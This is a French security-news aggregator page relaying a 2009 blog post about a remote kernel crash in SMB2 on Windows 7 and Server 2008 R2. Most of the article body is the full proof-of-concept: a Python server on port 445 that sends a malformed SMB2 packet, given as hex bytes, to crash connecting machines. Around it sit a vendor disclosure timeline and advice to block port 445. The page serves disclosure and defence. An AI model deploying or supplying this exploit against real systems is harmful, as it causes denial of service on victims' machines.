|
|
|
Secu Remote Kernel Crash sur Windows7 et Server 2008R2 |
Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Secu Remote Kernel Crash sur Windows7 et Server 2008R2 Par cloud's BlogLe [2009-11-11] à 22:48:34
Présentation : Laurent Gaffie a encore frappé sur le SMB. Un nouveau Remote Kernel Crash sur Windows 7 et Windows Server 2008 2 a été publié sur son blog. Il avait annoncé sur son Twitter développer un vrai Fuzzer pour SMB et voila chose faite de manière efficace contrairement à Microsoft apparement. Du coup une belle remote et une note signalant que Microsoft souhaitait que cette vulnérabilité reste cachée ... X. REVISION HISTORY ------------------------- November 8th, 2009 MSRC contacted November 8th, 2009 MSRC acknoledge the vuln November 11th, 2009 MRSC try to convince me that multi-vendor-ipv6 bug shouldn't appears on a security bulletin. November 11th, 2009 Win 7 remote kernel smash released Le code source Trigger a remote kernel crash on Win7 and server 2008R2 infinite loop Crash in KeAccumulateTicks due to NT_ASSERT DbgRaiseAssertionFailure caused by an infinite loop. NO BSOD, YOU GOTTA PULL THE PLUG. To trigger it fast from the target this_script_ip_addr BLAH , instantlycrash Author Laurent Gaffié import SocketServer packet x00 x00 x00 x9a --- length should be 9e not 9a.. xfe x53 x4d x42 x40 x00 x00 x00 x00 x00 x00 x00 x00 x00 x01 x00 x01 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x00 x41 x00 x01 x00 x02 x02 x00 x00 x30 x82 xa4 x11 xe3 x12 x23 x41 xaa x4b xad x99 xfd x52 x31 x8d x01 x00 x00 x00 x00 x00 x01 x00 x00 x00 x01 x00 x00 x00 x01 x00 xcf x73 x67 x74 x62 x60 xca x01 xcb x51 xe0 x19 x62 x60 xca x01 x80 x00 x1e x00 x20 x4c x4d x20 x60 x1c x06 x06 x2b x06 x01 x05 x05 x02 xa0 x12 x30 x10 xa0 x0e x30 x0c x06 x0a x2b x06 x01 x04 x01 x82 x37 x02 x02 x0a class SMB2 SocketServer.BaseRequestHandler def handle self print Who , self.client_address input self.request.recv 1024 self.request.send packet self.request.close launch SocketServer.TCPServer '', 445 ,SMB2 listen all interfaces port 445 launch.serve_forever Et la cerise sur le gateau, c'est qu'apparement d'autres remote exploits sont déjà prets XII.Personal Notes ------------------------- More Remote Kernel FD MS to come. Aucun correctif pour l'instant donc désactivez SMB et bloquer le port 445 avec votre firewall ou changez d'OS.
Les mots clés de la revue de presse pour cet article : remote kernel crash server Les videos sur SecuObs pour les mots clés : remote crash server Les éléments de la revue Twitter pour les mots clé : remote kernel crash server
Les derniers articles du site "cloud's Blog" :
- Tool ForensicPCAP, un outil d'analyse de PCAP en python - Secu Blocage compte avec Pwpolicy sous MacOSX - Tuto Changement de lecteur PDF avec Cuckoo - Tuto Probleme installation Cobradroid - Bug Correction bug Browse Cuckoo - Humour Blague geek sur Viadeo - Root sur VeraLite sans authentification - Root SSH sur box VeraLite - WTF Euromillion et la s - PHP Strcmp bypass
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.191.75.173 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.191.75.173 to any 80"
- Nous contacter par mail
| Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
| Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
| Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
| Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|